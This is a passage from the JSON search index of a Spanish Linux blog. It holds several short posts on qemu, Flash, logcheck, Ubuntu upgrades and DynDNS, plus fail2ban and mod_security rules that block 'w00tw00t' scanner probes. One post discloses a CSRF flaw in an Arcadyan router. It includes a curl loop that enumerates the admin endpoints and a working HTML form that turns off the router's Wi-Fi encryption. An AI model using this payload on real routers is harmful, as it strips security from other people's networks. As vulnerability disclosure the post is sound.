detecta el escaneo en el fichero de log del Apache, banee al usuario durante un tiempo:\n[apache-w00tw00t] enabled = true filter = apache-w00tw00t action = iptables-allports[name=w00tw00t] mail-whois[name=w00tw00t, dest=] logpath = /var/log/apache2/other_vhosts_access.log maxretry = 1 bantime = 86400 mod_security Y por último, también se puede utilizar mod_security, añadiendo las siguientes reglas:\nSetEnvIfNoCase Request_URI \u0026#34;w00tw00t.at.blackhats.romanian.anti-sec\u0026#34; drop SetEnvIfNoCase Request_URI \u0026#34;w00tw00t.at.ISC.SANS.DFind\u0026#34; drop SetEnvIfNoCase Request_URI \u0026#34;w00tw00t.at.ISC.SANS.test0\u0026#34; drop Lo malo es que mod_security no nos protegerá de esa IP contra otros servicios.\n","permalink":"http://karpoke.ignaciocano.com/2011/01/17/w00t-w00t/","summary":"\u003cp\u003eSi revisamos los \u003cem\u003elogs\u003c/em\u003e del servidor web, de vez en cuando aparecen toda una\nserie de peticiones del tipo:\u003c/p\u003e\n\u003cpre tabindex=\"0\"\u003e\u003ccode\u003e193.108.81.203 - - [12/Jan/2011:16:48:31 +0100] \u0026#34;GET /w00tw00t.at.blackhats.romanian.anti-sec:) HTTP/1.1\u0026#34; 404 488 \u0026#34;-\u0026#34; \u0026#34;ZmEu\u0026#34;\n193.108.81.203 - - [12/Jan/2011:16:48:34 +0100] \u0026#34;GET /db/scripts/setup.php HTTP/1.1\u0026#34; 404 471 \u0026#34;-\u0026#34; \u0026#34;ZmEu\u0026#34;\n193.108.81.203 - - [12/Jan/2011:16:48:35 +0100] \u0026#34;GET /mysql/scripts/setup.php HTTP/1.1\u0026#34; 404 473 \u0026#34;-\u0026#34; \u0026#34;ZmEu\u0026#34;\n193.108.81.203 - - [12/Jan/2011:16:48:35 +0100] \u0026#34;GET /typo3/phpmyadmin/scripts/setup.php HTTP/1.1\u0026#34; 404 480 \u0026#34;-\u0026#34; \u0026#34;ZmEu\u0026#34;\n193.108.81.203 - - [12/Jan/2011:16:48:38 +0100] \u0026#34;GET /phpmyadmin/scripts/setup.php HTTP/1.1\u0026#34; 404 477 \u0026#34;-\u0026#34; \u0026#34;ZmEu\u0026#34;\n193.108.81.203 - - [12/Jan/2011:16:48:38 +0100] \u0026#34;GET /pma/scripts/setup.php HTTP/1.1\u0026#34; 404 472 \u0026#34;-\u0026#34; \u0026#34;ZmEu\u0026#34;\n193.108.81.203 - - [12/Jan/2011:16:48:39 +0100] \u0026#34;GET /web/phpMyAdmin/scripts/setup.php HTTP/1.1\u0026#34; 404 479 \u0026#34;-\u0026#34; \u0026#34;ZmEu\u0026#34;\n193.108.81.203 - - [12/Jan/2011:16:48:39 +0100] \u0026#34;GET /xampp/phpmyadmin/scripts/setup.php HTTP/1.1\u0026#34; 404 480 \u0026#34;-\u0026#34; \u0026#34;ZmEu\u0026#34;\n193.108.81.203 - - [12/Jan/2011:16:48:39 +0100] \u0026#34;GET /web/scripts/setup.php HTTP/1.1\u0026#34; 404 472 \u0026#34;-\u0026#34; \u0026#34;ZmEu\u0026#34;\n193.108.81.203 - - [12/Jan/2011:16:48:39 +0100] \u0026#34;GET /websql/scripts/setup.php HTTP/1.1\u0026#34; 404 474 \u0026#34;-\u0026#34; \u0026#34;ZmEu\u0026#34;\n193.108.81.203 - - [12/Jan/2011:16:48:40 +0100] \u0026#34;GET /webadmin/scripts/setup.php HTTP/1.1\u0026#34; 404 476 \u0026#34;-\u0026#34; \u0026#34;ZmEu\u0026#34;\n193.108.81.203 - - [12/Jan/2011:16:48:40 +0100] \u0026#34;GET /sqlweb/scripts/setup.php HTTP/1.1\u0026#34; 404 474 \u0026#34;-\u0026#34; \u0026#34;ZmEu\u0026#34;\n193.108.81.203 - - [12/Jan/2011:16:48:40 +0100] \u0026#34;GET /websql/scripts/setup.php HTTP/1.1\u0026#34; 404 474 \u0026#34;-\u0026#34; \u0026#34;ZmEu\u0026#34;\n\u003c/code\u003e\u003c/pre\u003e\u003cp\u003eEn este caso, la IP parece ser del \u003ca href=\"http://www.ipillion.com/ip/193.108.81.203\"\u003eReino Unido\u003c/a\u003e, pero va variando, así como\nla petición característica que hace al principio y el \u003cem\u003e\u003ca href=\"http://httpd.apache.org/docs/2.0/es/logs.html\"\u003euser agent\u003c/a\u003e\u003c/em\u003e del\nfinal, \u0026ldquo;\u003ca href=\"http://linux.m2osw.com/zmeu-attack\"\u003eZemu\u003c/a\u003e\u0026rdquo;. En otras ocasiones, la petición es\n\u003ccode\u003e/w00tw00t.at.ISC.SANS.DFind:)\u003c/code\u003e.\u003c/p\u003e","title":"w00t w00t"},{"content":"Trasteando con qemu y Damn Small Linux, creamos una imagen de disco de 500 MB:\n$ qemu-img create -f qcow hd-500m.img 500M Y lanzamos el programa:\n$ qemu -hda hd-500m.img -cdrom dsl-4.4.10.iso -boot d -m 128 -localtime En seguida nos aparece el siguiente mensaje:\npci_add_option_rom: failed to find romfile \u0026#34;pxe-rtl8139.bin\u0026#34; El error que aparece, aunque no evita que la distribución arranque, se debe a que en Ubuntu, por defecto, no están instalados los binarios para permitir que el sistema operativo emulado arranque por red.\nLa solución es instalar el paquete kvm-pxe:\n$ sudo aptitude install kvm-pxe ","permalink":"http://karpoke.ignaciocano.com/2011/01/14/pci_add_option_rom-failed-to-find-romfile-pxe-rtl8139-bin/","summary":"\u003cp\u003eTrasteando con \u003ccode\u003eqemu\u003c/code\u003e y \u003ccode\u003eDamn Small Linux\u003c/code\u003e, creamos una imagen de disco\nde 500 MB:\u003c/p\u003e\n\u003cpre tabindex=\"0\"\u003e\u003ccode\u003e$ qemu-img create -f qcow hd-500m.img 500M\n\u003c/code\u003e\u003c/pre\u003e\u003cp\u003eY lanzamos el programa:\u003c/p\u003e\n\u003cpre tabindex=\"0\"\u003e\u003ccode\u003e$ qemu -hda hd-500m.img -cdrom dsl-4.4.10.iso -boot d -m 128 -localtime\n\u003c/code\u003e\u003c/pre\u003e\u003cp\u003eEn seguida nos aparece el siguiente mensaje:\u003c/p\u003e\n\u003cpre tabindex=\"0\"\u003e\u003ccode\u003epci_add_option_rom: failed to find romfile \u0026#34;pxe-rtl8139.bin\u0026#34;\n\u003c/code\u003e\u003c/pre\u003e\u003cp\u003eEl error que aparece, aunque no evita que la distribución arranque, se\ndebe a que en Ubuntu, por defecto, \u003ca href=\"http://wiki.tudos.org/QEmu\"\u003eno están instalados los binarios\u003c/a\u003e\npara permitir que el sistema operativo emulado arranque por red.\u003c/p\u003e","title":"pci_add_option_rom: failed to find romfile \"pxe-rtl8139.bin\""},{"content":"Leyendo el blog Usemos Linux, veo que podemos optimizar el rendimiento del uso de Flash, configurando el complemento para que no realice algunas comprobaciones de la GPU, con lo que se alivia el consumo de CPU y de memoria.\nSin embargo, no en todos los casos se conseguirá esta mejora del rendimiento. Esto dependerá de:\nel contenido debe estar preparado para utilizar la GPU, de lo contrario, la reproducción hasta podría volverse más lenta. los requerimientos de hardware para la GPU en el modo GPU son importantes. no se puede garantizar la fidelidad de los píxels, ya que podrían cambiar de color. no importa si el frame rate está por encima de 60, nunca será superior. De hecho, podemos esperar que sea entre 50 y 55 fps. no se debería usar, o abusar, del modo GPU para todo el contenido Flash que se utilice en una página, ya que degradaría bastante la respuesta del navegador. el rendimiento también depende de los fabricantes y sus controladores. Para configurar el complemento, deberemos crear el fichero de configuración mms.cfg. Ejecutamos:\n$ sudo mkdir /etc/adobe $ echo \u0026#34;OverrideGPUValidation=true\u0026#34; | sudo tee /etc/adobe/mms.cfg También podemos configurarlo como preferencias de usuario:\n$ mkdir ~/adobe $ echo \u0026#34;OverrideGPUValidation=true\u0026#34; \u0026gt;\u0026gt; ~/.adobe/mms.cfg ","permalink":"http://karpoke.ignaciocano.com/2011/01/11/optimizar-el-rendimiento-de-flash/","summary":"\u003cp\u003eLeyendo el blog \u003ca href=\"http://usemoslinux.blogspot.com/2011/01/como-evitar-que-flash-arruine-tu.html\"\u003eUsemos Linux\u003c/a\u003e, veo que podemos \u003ca href=\"http://blogs.adobe.com/penguinswf/2008/08/secrets_of_the_mmscfg_file_1.html\"\u003eoptimizar el\nrendimiento del uso de Flash\u003c/a\u003e, configurando el complemento para que no\nrealice algunas comprobaciones de la GPU, con lo que se alivia el\nconsumo de CPU y de memoria.\u003c/p\u003e\n\u003cp\u003eSin embargo, no en todos los casos se conseguirá esta mejora del\nrendimiento. Esto \u003ca href=\"http://www.kaourantin.net/2008/05/what-does-gpu-acceleration-mean.html\"\u003edependerá\u003c/a\u003e de:\u003c/p\u003e\n\u003col\u003e\n\u003cli\u003eel contenido debe estar preparado para utilizar la GPU, de lo\u003c/li\u003e\n\u003c/ol\u003e\n\u003cpre tabindex=\"0\"\u003e\u003ccode\u003econtrario, la reproducción hasta podría volverse más lenta.\n\u003c/code\u003e\u003c/pre\u003e\u003col start=\"2\"\u003e\n\u003cli\u003elos requerimientos de hardware para la GPU en el modo GPU son\u003c/li\u003e\n\u003c/ol\u003e\n\u003cpre tabindex=\"0\"\u003e\u003ccode\u003eimportantes.\n\u003c/code\u003e\u003c/pre\u003e\u003col start=\"3\"\u003e\n\u003cli\u003eno se puede garantizar la fidelidad de los \u003cem\u003epíxels\u003c/em\u003e, ya que podrían\u003c/li\u003e\n\u003c/ol\u003e\n\u003cpre tabindex=\"0\"\u003e\u003ccode\u003ecambiar de color.\n\u003c/code\u003e\u003c/pre\u003e\u003col start=\"4\"\u003e\n\u003cli\u003eno importa si el \u003cem\u003eframe rate\u003c/em\u003e está por encima de 60, nunca será\u003c/li\u003e\n\u003c/ol\u003e\n\u003cpre tabindex=\"0\"\u003e\u003ccode\u003esuperior. De hecho, podemos esperar que sea entre 50 y 55 fps.\n\u003c/code\u003e\u003c/pre\u003e\u003col start=\"5\"\u003e\n\u003cli\u003eno se debería usar, o abusar, del modo GPU para todo el contenido\u003c/li\u003e\n\u003c/ol\u003e\n\u003cpre tabindex=\"0\"\u003e\u003ccode\u003eFlash que se utilice en una página, ya que degradaría bastante la\nrespuesta del navegador.\n\u003c/code\u003e\u003c/pre\u003e\u003col start=\"6\"\u003e\n\u003cli\u003eel rendimiento también depende de los fabricantes y sus\u003c/li\u003e\n\u003c/ol\u003e\n\u003cpre tabindex=\"0\"\u003e\u003ccode\u003econtroladores.\n\u003c/code\u003e\u003c/pre\u003e\u003cp\u003ePara configurar el complemento, deberemos crear el fichero de configuración\n\u003ccode\u003emms.cfg\u003c/code\u003e. Ejecutamos:\u003c/p\u003e","title":"Optimizar el rendimiento de Flash"},{"content":"Tras instalar logcheck, un programa que escanea los ficheros de log del sistema en busca de \u0026ldquo;líneas interesantes\u0026rdquo;, comencé a recibir demasiados avisos del tipo:\nJan 7 02:04:38 terminus ntpd[1117]: kernel time sync status change 6001 \u0026#34;1117\u0026#34; Jan 7 02:21:44 terminus ntpd[1117]: kernel time sync status change 2001 \u0026#34;1117\u0026#34; Estos cambios son debidos a que ntp cambia dinámicamente entre los modo FLL y el PLL, lo que le permite tener en cuenta la latencia de la red o el jitter a la hora de actualizar el reloj del sistema.\nPor lo tanto, los mensajes son inofensivos, y si queremos que no nos lleguen más, deberemos cambiar una regla que se encuentra en el fichero /etc/logcheck/ignore.d.server/ntp (si el modo en que trabaja logcheck es server y así está especificado en el fichero /etc/logcheck/logcheck.conf).\nCambiaremos:\n^\\w{3} [ :0-9]{11} [._[:alnum:]-]+ ntpd\\[[0-9]+\\]: kernel time sync (disabled|enabled) [0-9]+$ \u0026#34; :0-9]{11} [._[:alnum:]-]+ ntpd\\[[0-9]+\\\u0026#34; por:\n^\\w{3} [ :0-9]{11} [._[:alnum:]-]+ ntpd\\[[0-9]+\\]: kernel time sync (disabled|enabled|status change) [0-9]+$ \u0026#34; :0-9]{11} [._[:alnum:]-]+ ntpd\\[[0-9]+\\\u0026#34; ","permalink":"http://karpoke.ignaciocano.com/2011/01/07/kernel-time-sync-status-change/","summary":"\u003cp\u003eTras instalar \u003ccode\u003elogcheck\u003c/code\u003e, un programa que escanea los ficheros de \u003cem\u003elog\u003c/em\u003e\ndel sistema en busca de \u0026ldquo;líneas interesantes\u0026rdquo;, comencé a recibir\ndemasiados avisos del tipo:\u003c/p\u003e\n\u003cpre tabindex=\"0\"\u003e\u003ccode\u003eJan  7 02:04:38 terminus ntpd[1117]: kernel time sync status change 6001\n\u0026#34;1117\u0026#34;\nJan  7 02:21:44 terminus ntpd[1117]: kernel time sync status change 2001\n\u0026#34;1117\u0026#34;\n\u003c/code\u003e\u003c/pre\u003e\u003cp\u003e\u003ca href=\"http://lists.freebsd.org/pipermail/freebsd-stable/2005-April/013404.html\"\u003eEstos cambios son debidos\u003c/a\u003e a que \u003ccode\u003entp\u003c/code\u003e cambia \u003ca href=\"http://www.eecis.udel.edu/~mills/database/papers/allan.pdf\"\u003edinámicamente\u003c/a\u003e entre\nlos modo \u003ccode\u003eFLL\u003c/code\u003e y el \u003ccode\u003ePLL\u003c/code\u003e, lo que le permite tener en cuenta la latencia\nde la red o el \u003cem\u003ejitter\u003c/em\u003e a la hora de actualizar el reloj del sistema.\u003c/p\u003e","title":"kernel time sync status change"},{"content":"Instalamos el paquete update-manager, si es que no lo teníamos:\n$ sudo aptitude install update-manager Comprobamos que el fichero /etc/update-manager/release-upgrades contiene:\nPrompt=normal Si contiene Prompt=lts sólo nos actualizará si hay una LTS nueva. Si contiene Prompt=never\u0026hellip; no actualizará nada.\nY ejecutamos el comando do-release-upgrade:\n$ sudo do-release-upgrade » ubuntugeek\n","permalink":"http://karpoke.ignaciocano.com/2011/01/07/actualizando-ubuntu-a-la-ultima-distribucion-de-forma-remota/","summary":"\u003cp\u003eInstalamos el paquete \u003ccode\u003eupdate-manager\u003c/code\u003e, si es que no lo teníamos:\u003c/p\u003e\n\u003cpre tabindex=\"0\"\u003e\u003ccode\u003e$ sudo aptitude install update-manager\n\u003c/code\u003e\u003c/pre\u003e\u003cp\u003eComprobamos que el fichero \u003ccode\u003e/etc/update-manager/release-upgrades\u003c/code\u003e\ncontiene:\u003c/p\u003e\n\u003cpre tabindex=\"0\"\u003e\u003ccode\u003ePrompt=normal\n\u003c/code\u003e\u003c/pre\u003e\u003cp\u003eSi contiene \u003ccode\u003ePrompt=lts\u003c/code\u003e sólo nos actualizará si hay una \u003ca href=\"http://es.wikipedia.org/wiki/Ubuntu\"\u003eLTS\u003c/a\u003e nueva.\nSi contiene \u003ccode\u003ePrompt=never\u003c/code\u003e\u0026hellip; no actualizará nada.\u003c/p\u003e\n\u003cp\u003e\u003cimg alt=\"Ape Man Evolution\" loading=\"lazy\" src=\"/images/ape_man_evolution.png\"\u003e\u003c/p\u003e\n\u003cp\u003eY ejecutamos el comando \u003ccode\u003edo-release-upgrade\u003c/code\u003e:\u003c/p\u003e\n\u003cpre tabindex=\"0\"\u003e\u003ccode\u003e$ sudo do-release-upgrade\n\u003c/code\u003e\u003c/pre\u003e\u003cp\u003e» \u003ca href=\"http://www.ubuntugeek.com/how-to-upgrade-from-ubuntu-10-04-lucid-to-ubuntu-10-10-maverick-desktop-and-server.html\"\u003eubuntugeek\u003c/a\u003e\u003c/p\u003e","title":"Actualizando Ubuntu a la última distribución de forma remota"},{"content":"El router es un Arcadyan, modelo Astoria AVR4518PW. Y parece que es vulnerable a ataques CSRF.\nSi tienes este router y has iniciado sesión en el panel de administración, pulsando en el siguiente enlace se cerrará la sesión de usuario. Si has cambiado la IP por defecto, 192.168.2.1, no funcionará, pero lo puedes probar escribiendo en la barra de direcciones del navegador:\njavascript:document.location.href=\u0026#39;http://192.168.2.1/cgi-bin/logout.exe\u0026#39; **INCLUSO si lo haces desde un navegador distinto al que tengas abierta la página de administración del router, o desde la consola!!!__ Por lo que supongo que el router, una vez autenticado el usuario desde una IP, autoriza cualquier petición que provenga desde esa IP.\nEl panel de administración web está compuesto de marcos, uno que contiene el menú, otro que tiene la parte superior de la página y otro en el que se carga la página de cada una de las secciones. Para ver cuales son estas páginas, mientras hayamos iniciado sesión, podemos inspeccionar el código fuente de la página del menú desde la consola.\n$ curl http://192.168.2.1/menu.stm | grep -Eo [a-z_-]+.stm | sort adsl_main.stm adsl_para.stm adsl_para.stm adsl_status.stm advanced_user_p.stm arcor_network.stm arcor_network.stm atmpvc.stm atmpvc_ya.stm atmpvc_ya.stm clone.stm ddns_main.stm ddns_main.stm dns_proxy.stm firewall_a.stm firewall_d.stm firewall_mac.stm firewall_main.stm firewall_rule.stm firewall_spi_h.stm firewall_u.stm info_voip.stm iptv_main.stm lan_main.stm menu.stm nat_main.stm nat_m.stm nat_sp.stm nat_v.stm pin_code.stm pingtest.stm qos_clsmap.stm qos_main.stm qos_stats.stm r_mort.stm route_main.stm route_tbl.stm r_rip.stm setup_dns.stm setupw.stm snmp_community.stm snmp_main.stm snmp_trap.stm status_main.stm system_c.stm system_f.stm system_main.stm system_p.stm system_remote_mgmt.stm system_r.stm system.stm system_t.stm telephony_voip.stm tl_main.stm upnp_main.stm upnp_main.stm usb_fsrv.stm usb_ftp_server.stm usb_main.stm usb_modem.stm usb_pr_server.stm usb_wftp_server.stm v_lan.stm voip_account_ya.stm voip_advanced.stm voip_adv_port.stm voip_call_allocation.stm voip_call_allocation.stm voip_dial.stm voip_extension_out.stm voip_extension.stm voip_isdn_msn.stm voip_main.stm voip_numbers_act.stm voip_numbers_act.stm voip_num_plan.stm voip_phone.stm voip_quick_dial.stm voip_sip.stm voip_status.stm wan_main.stm wan_main.stm wireless_e.stm wireless_e.stm wireless_id.stm wireless_mac.stm wireless_main.stm wireless_wds.stm Vamos a ver en cuáles de estas páginas se hacen llamadas a scripts, como el que vimos antes. Debemos haber iniciado sesión para que funcione lo siguiente:\n$ for url in $(curl -s http://192.168.2.1/menu.stm | grep -Eo [a-z_-]+.stm | sort); do echo \u0026#34;En $url\u0026#34; curl -s http://192.168.2.1/$url | grep -Eo \u0026#34;/cgi-bin/[a-z_-]*\\.exe\u0026#34;; done En adsl_main.stm En adsl_para.stm /cgi-bin/aadsl.exe En adsl_para.stm /cgi-bin/aadsl.exe En adsl_status.stm /cgi-bin/setup_pass.exe En advanced_user_p.stm En arcor_network.stm /cgi-bin/arcor_network.exe En arcor_network.stm /cgi-bin/arcor_network.exe En atmpvc.stm En atmpvc_ya.stm /cgi-bin/atmprofile.exe En atmpvc_ya.stm /cgi-bin/atmprofile.exe En clone.stm /cgi-bin/clMac.exe En ddns_main.stm /cgi-bin/setup_ddns.exe En ddns_main.stm /cgi-bin/setup_ddns.exe En dns_proxy.stm /cgi-bin/dnsproxy_eb.exe En firewall_a.stm /cgi-bin/aoaccdel.exe /cgi-bin/ac_control.exe En firewall_d.stm /cgi-bin/setup_dmz.exe En firewall_mac.stm /cgi-bin/macac_control.exe En firewall_main.stm /cgi-bin/fire_eb.exe En firewall_rule.stm /cgi-bin/aoschdel.exe /cgi-bin/setup_sch.exe En firewall_spi_h.stm /cgi-bin/firewall_SPI.exe En firewall_u.stm /cgi-bin/Aurlbk.exe En info_voip.stm En iptv_main.stm /cgi-bin/iptv_eb.exe En lan_main.stm /cgi-bin/setup_lan.exe /cgi-bin/setup_lan.exe En menu.stm /cgi-bin/nat_show.exe En nat_main.stm /cgi-bin/nat_eb.exe En nat_m.stm /cgi-bin/setup_fix_pat.exe En nat_sp.stm /cgi-bin/nat_sp.exe En nat_v.stm /cgi-bin/setup_virtualser.exe En pin_code.stm /cgi-bin/setup_pincode.exe En pingtest.stm /cgi-bin/ping_test.exe En qos_clsmap.stm En qos_main.stm En qos_stats.stm En r_mort.stm En route_main.stm En route_tbl.stm /cgi-bin/ArouteNew.exe /cgi-bin/ArouteNew.exe En r_rip.stm /cgi-bin/Arip.exe En setup_dns.stm /cgi-bin/setup_dns.exe En setupw.stm En snmp_community.stm En snmp_main.stm En snmp_trap.stm En status_main.stm /cgi-bin/statusprocess.exe /cgi-bin/statusprocess.exe En system_c.stm /cgi-bin/setup_config_data.exe En system_f.stm /cgi-bin/upgrade.exe En system_main.stm /cgi-bin/system_main.exe En system_p.stm /cgi-bin/setup_pass.exe En system_remote_mgmt.stm /cgi-bin/setup_remote_mgmt.exe En system_r.stm /cgi-bin/restart.exe En system.stm En system_t.stm /cgi-bin/ntp_setting.exe En telephony_voip.stm /cgi-bin/voip_acc_clr.exe /cgi-bin/voip_account.exe En tl_main.stm En upnp_main.stm /cgi-bin/upnp_eb.exe En upnp_main.stm /cgi-bin/upnp_eb.exe En usb_fsrv.stm /cgi-bin/setup_disk.exe En usb_ftp_server.stm /cgi-bin/setup_ftp.exe En usb_main.stm /cgi-bin/usb.exe En usb_modem.stm /cgi-bin/usb_modem.exe En usb_pr_server.stm /cgi-bin/setup_pr.exe En usb_wftp_server.stm /cgi-bin/setup_wftp.exe En v_lan.stm /cgi-bin/switch_vlan_delete.exe /cgi-bin/switch_vlan_delete.exe /cgi-bin/switch_vlan_delete.exe En voip_account_ya.stm /cgi-bin/voip_account_edit.exe En voip_advanced.stm En voip_adv_port.stm En voip_call_allocation.stm /cgi-bin/voip-call-allocation.exe En voip_call_allocation.stm /cgi-bin/voip-call-allocation.exe En voip_dial.stm En voip_extension_out.stm /cgi-bin/voip-ext-out.exe En voip_extension.stm En voip_isdn_msn.stm /cgi-bin/voip-isdn-msn.exe En voip_main.stm En voip_numbers_act.stm /cgi-bin/voip-call-out.exe En voip_numbers_act.stm /cgi-bin/voip-call-out.exe En voip_num_plan.stm En voip_phone.stm /cgi-bin/voip-phone.exe En voip_quick_dial.stm En voip_sip.stm En voip_status.stm /cgi-bin/del_call_log.exe En wan_main.stm /cgi-bin/setup_wan.exe En wan_main.stm /cgi-bin/setup_wan.exe En wireless_e.stm /cgi-bin/wps_set.exe /cgi-bin/wireless_e.exe /cgi-bin/wireless_wep.exe /cgi-bin/wireless_wpa.exe En wireless_e.stm /cgi-bin/wps_set.exe /cgi-bin/wireless_e.exe /cgi-bin/wireless_wep.exe /cgi-bin/wireless_wpa.exe En wireless_id.stm /cgi-bin/wireless_ssid.exe En wireless_mac.stm /cgi-bin/add_cur_mac.exe /cgi-bin/wireless_f.exe En wireless_main.stm /cgi-bin/wireless_eb.exe En wireless_wds.stm /cgi-bin/wireless_wds.exe Faltan los del menú superior:\n$ curl http://192.168.2.1/setupa_top.stm | grep -Eo \u0026#34;/cgi-bin/[a-z_-]*\\.exe\u0026#34; /cgi-bin/logout.exe /cgi-bin/change_language.exe Una de las primeras cosas que he probado es que es posible deshabilitar el cifrado para la red inalámbrica. Si creamos un formulario como este:\n\u0026lt;form action=\u0026#34;http://192.168.2.1/cgi-bin/wireless_e.exe\u0026#34; method=\u0026#34;post\u0026#34;\u0026gt; \u0026lt;input type=\u0026#34;text\u0026#34; name=\u0026#34;changewep\u0026#34; value=\u0026#34;0\u0026#34;\u0026gt; \u0026lt;input type=\u0026#34;text\u0026#34; name=\u0026#34;client_type\u0026#34; value=\u0026#34;0\u0026#34;\u0026gt; \u0026lt;input type=\u0026#34;text\u0026#34; name=\u0026#34;wpa_authen\u0026#34; value=\u0026#34;0\u0026#34;\u0026gt; \u0026lt;input type=\u0026#34;text\u0026#34; name=\u0026#34;do_submit\u0026#34; value=\u0026#34;1\u0026#34;\u0026gt; \u0026lt;input type=\u0026#34;text\u0026#34; name=\u0026#34;wps_enable\u0026#34;\u0026gt; \u0026lt;input type=\u0026#34;text\u0026#34; name=\u0026#34;vap\u0026#34; value=\u0026#34;0\u0026#34;\u0026gt; \u0026lt;input type=\u0026#34;text\u0026#34; name=\u0026#34;cur_vap\u0026#34; value=\u0026#34;0\u0026#34;\u0026gt; \u0026lt;input type=\u0026#34;text\u0026#34; name=\u0026#34;securitytype\u0026#34; value=\u0026#34;2\u0026#34;\u0026gt; \u0026lt;input type=\u0026#34;submit\u0026#34; value=\u0026#34;submit\u0026#34;\u0026gt; El campo cur_vap se refiere al punto de acceso inalámbrico; el router permite tener dos. Y el campo securitytype se refiere al tipo de cifrado que queremos. Los valores que puede tomar este campo son:\n|`securitytype`| Tipo de cifrado| |--------------|----------------| | 0 | WPA/WPA2 | | 1 | WEP | | 2 | Deshabilitado| | 3 | Sólo WPA | | 4 | Sólo WPA2 | En función del tipo de cifrado, tendremos que utilizar otros campos y otros action para el formulario.\nAquí hay una prueba de concepto, aunque el action del formulario tiene la IP por defecto del router, 192.168.2.1.\n","permalink":"http://karpoke.ignaciocano.com/2011/01/01/csrf-en-el-panel-de-administracion-del-router-arcadyan-de-ya-com/","summary":"\u003cp\u003eEl router es un Arcadyan, modelo Astoria AVR4518PW. Y parece que es\nvulnerable a ataques CSRF.\u003c/p\u003e\n\u003cp\u003e\u003cimg alt=\"Router Arcadyan\" loading=\"lazy\" src=\"/images/router-arcadyan-300x225.jpg\"\u003e\u003c/p\u003e\n\u003cp\u003eSi tienes este router y has iniciado sesión en el panel de\nadministración, pulsando en el siguiente enlace se \u003ca href=\"#\"\u003ecerrará la sesión de\nusuario\u003c/a\u003e. Si has cambiado la IP por defecto, 192.168.2.1, no\nfuncionará, pero lo puedes probar escribiendo en la barra de direcciones\ndel navegador:\u003c/p\u003e\n\u003cpre tabindex=\"0\"\u003e\u003ccode\u003ejavascript:document.location.href=\u0026#39;http://192.168.2.1/cgi-bin/logout.exe\u0026#39;\n\u003c/code\u003e\u003c/pre\u003e\u003cp\u003e**INCLUSO si lo haces desde un navegador distinto al que tengas abierta\nla página de administración del \u003cem\u003erouter\u003c/em\u003e, o desde la consola!!!__ Por lo\nque supongo que el router, una vez autenticado el usuario desde una IP,\nautoriza cualquier petición que provenga desde esa IP.\u003c/p\u003e","title":"CSRF en el panel de administración del router Arcadyan de ya.com"},{"content":"Con el comando inadyn podemos actualizar la IP de nuestro dominio, o dominios, en DynDNS, pero la IP no se pasa como argumento sino que se hace una consulta a un servidor que devuelve la IP pública que tenemos en ese momento. Por defecto, el servidor es checkip.dyndns.org:80.\nPodemos hacer que el dominio apunte a la IP que queramos utilizando el argumento --ip_server_name para especificar un servidor controlado por nosotros y que devuelva la IP que queramos.\nUna manera sencilla de montar un servidor HTTP temporal es utilizar el comando nc. Antes de ejecutarlo, crearemos un fichero index.html con el siguiente contenido, modificando la IP por la que nosotros queramos:\nCurrent IP Check Current IP Address: 209.85.146.106 Lanzamos el servidor:\n$ cat index.html | nc -l 8000 Y actualizamos nuestro dominio con la IP que pusimos en el archivo index.html:\n$ /usr/sbin/inadyn -u user -p pass --iterations 1 --dyndns_system custom@dyndns.org --ip_server_name localhost:8000 / -a anacreonte.homelinux.com Ojo, no es recomendable ir escribiendo nuestras contraseñas en la línea de comandos.\nBueno, después de hacer algunas pruebas más, he visto que no hace falta crear un fichero HTML, basta con que nuestro servidor devuelva la IP que queremos asignar:\n$ echo 209.85.146.106 | nc -l 8000 Otra manera sería utilizar un Apache, en el cual el fichero no tiene porqué estar en la raíz del dominio. En tal caso, la petición sería algo como:\n$ /usr/sbin/inadyn -u user -p pass --iterations 1 --dyndns_system custom@dyndns.org --ip_server_name smyrno.homelinux.com:8000 /path/ip.html -a anacreonte.homelinux.com donde el fichero ip.html es el que contiene la IP y se encuentra en el subdirectorio /path/.\nPor último, también he probado con Python, ejecutando:\n$ python -m SimpleHTTPServer 8000 pero esto no acaba de funcionar. inadyn una vez conectado al servidor realiza una petición que siempre recibe un error 404, dado que el archivo solicitado no se encuentra.\nPara mostrar este comportamiento, lazamos el servidor:\n$ python -m SimpleHTTPServer 8000 y en otra consola intentamos realizar la actualización:\n$ /usr/sbin/inadyn -u user -p pass --iterations 1 --dyndns_system custom@dyndns.org --ip_server_name localhost:8000 / -a anacreonte.homelinux.com --verbose 5 INADYN: Started \u0026#39;INADYN version 1.96.2\u0026#39; - dynamic DNS updater. The request for IP server: GET http://localhost:8000/ HTTP/1.0 DYNDNS: IP server response: HTTP/1.0 404 File not found Server: SimpleHTTP/0.6 Python/2.6.6 Date: Thu, 30 Dec 2010 16:43:31 GMT Content-Type: text/html Connection: close Error response Error response Error code 404. Message: File not found. Error code explanation: 404 = Nothing matches the given URI. W:\u0026#39;RC_DYNDNS_INVALID_RSP_FROM_IP_SERVER\u0026#39; (0x42) updating the IPs. (it 0) Este es el registro que muestra el servidor:\nServing HTTP on 0.0.0.0 port 8000 ... localhost.localdomain - - [30/Dec/2010 17:43:31] code 404, message File not found localhost.localdomain - - [30/Dec/2010 17:43:31] \u0026#34;GET http://localhost:8000/ HTTP/1.0\u0026#34; 404 - Sin embargo, si abrimos un navegador y vamos a la direccion localhost:8000, en el navegador nos aparece la IP y esto es lo que muestra el servidor:\nlocalhost.localdomain - - [30/Dec/2010 17:51:15] \u0026#34;GET / HTTP/1.1\u0026#34; 200 - Actualizado el 10 de junio de 2013 Actualmente, es posible actualizar el dominio con la IP que queramos, simplemente haciendo una petición como la siguiente:\n$ USERNAME=username $ PASSWORD=password $ DOMAIN=example.homelinux.com $ IP=1.2.3.4 $ curl https://$USERNAME:$PASSWORD@members.dyndns.org/nic/update?hostname=$DOMAIN\u0026amp;myip=$IP\u0026amp;wildcard=NOCHG\u0026amp;mx=NOCHG\u0026amp;backmx=NOCHG Debido a un cambio en la política de uso de las cuentas gratuitas, es necesario iniciar sesión mínimo una vez al mes para mantener los dominios.\n","permalink":"http://karpoke.ignaciocano.com/2010/12/30/asignar-la-ip-que-queramos-a-un-dominio-de-dyndns/","summary":"\u003cp\u003eCon el comando \u003ccode\u003einadyn\u003c/code\u003e podemos actualizar la IP de nuestro dominio, o\n\u003ca href=\"/2010/12/11/dyndns-e-inadyn/\"\u003edominios\u003c/a\u003e, en DynDNS, pero la IP no se pasa como argumento sino que\nse hace una consulta a un servidor que devuelve la IP pública que\ntenemos en ese momento. Por defecto, el servidor es\n\u003ccode\u003echeckip.dyndns.org:80\u003c/code\u003e.\u003c/p\u003e\n\u003cp\u003ePodemos hacer que el dominio apunte a la 